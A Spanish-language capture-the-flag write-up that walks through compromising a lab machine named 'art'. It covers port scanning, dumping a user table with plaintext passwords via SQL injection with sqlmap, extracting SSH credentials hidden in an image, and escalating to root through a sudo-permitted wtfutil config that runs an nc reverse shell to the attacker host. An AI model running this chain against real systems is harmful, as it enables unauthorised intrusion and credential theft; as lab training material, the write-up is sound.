Comenzamos enumerando puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.120
❯ nmap -sCV -p22,80 -oN 02-targeted.txt 192.168.1.120
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-31 17:00 -03
Nmap scan report for 192.168.1.120
Host is up (0.00036s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 45:42:0f:13:cc:8e:49:dd:ec:f5:bb:0f:58:f4:ef:47 (RSA)
| 256 12:2f:a3:63:c2:73:99:e3:f8:67:57:ab:29:52:aa:06 (ECDSA)
|_ 256 f8:79:7a:b1:a8:7e:e9:97:25:c3:40:4a:0c:2f:5e:69 (ED25519)
80/tcp open http nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.57 seconds❯ gobuster dir -u 'http://192.168.1.120' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,jpg,jpeg,gif,png -r
...
/index.php (Status: 200) [Size: 170]
...En index.php hay un comentario sobre un parámetro tag:
<!-- Need to solve tag parameter problem. -->El LFI no funciona, pero el parámetro es vulnerable a SQL Injection. Con sqlmap enumeramos y volcamos la base de datos:
❯ sqlmap -u "http://192.168.1.120/index.php?tag=" --dbs
available databases [2]:
[*] gallery
[*] information_schema
❯ sqlmap -u "http://192.168.1.120/index.php?tag=" -D gallery --dump
Database: gallery
Table: users
[8 entries]
+----+-----------------+--------+
| id | pass | user |
+----+-----------------+--------+
| 1 | realpazz | mina |
| 2 | mncxzKLLJDS | me |
| 3 | 987dsKLDSOIU | lula |
| 4 | BDSAOIUYEW | notme |
| 5 | dsOIUSDAOydsa | mona |
| 6 | EWQUDSAdaSDSA= | admin |
| 7 | VCXddsaEWQdsa_D | lila |
| 8 | DSAewqDSAewq | root |
+----+-----------------+--------+
Table: art
[5 entries]
+----+-----------+---------------+
| id | tag | image |
+----+-----------+---------------+
| 1 | beautiful | abc321.jpg |
| 2 | beautiful | jlk19990.jpg |
| 3 | beautiful | ertye.jpg |
| 4 | beautiful | zzxxccvv3.jpg |
| 5 | beauty | dsa32.jpg |
+----+-----------+---------------+Las credenciales no funcionan, pero la imagen dsa32.jpg (que no habíamos analizado) esconde datos:
❯ stegseek -wl ~/Documentos/wordlists/rockyou.txt dsa32.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: ""
[i] Original filename: "yes.txt".
[i] Extracting to "dsa32.jpg.out".
❯ cat dsa32.jpg.out
lion/shel0vesyouCon lion:shel0vesyou accedemos por SSH y obtenemos la primera flag. Revisamos sudo -l:
lion@art:~$ sudo -l
Matching Defaults entries for lion on art:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User lion may run the following commands on art:
(ALL : ALL) NOPASSWD: /bin/wtfutilwtfutil carga un archivo de configuración YAML personalizado que permite ejecutar comandos (cmdrunner). Tomamos una plantilla y la editamos para lanzar una reverse shell:
❯ cat pwned.yml
wtf:
grid:
columns: [20, 20]
rows: [3, 3]
refreshInterval: 1
mods:
uptime:
type: cmdrunner
args: ['-e','/bin/bash','192.168.1.10','1234']
cmd: "nc"
enabled: true
position:
top: 0
left: 0
height: 1
width: 1
refreshInterval: 30lion@art:~$ sudo /bin/wtfutil --config=pwned.yml
❯ ncat -nlvp 1234
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.1.120:33300.
id
uid=0(root) gid=0(root) grupos=0(root)Buscamos la flag de root:
root@art:~# find / -name root.txt 2>/dev/null
/var/opt/root.txtFin.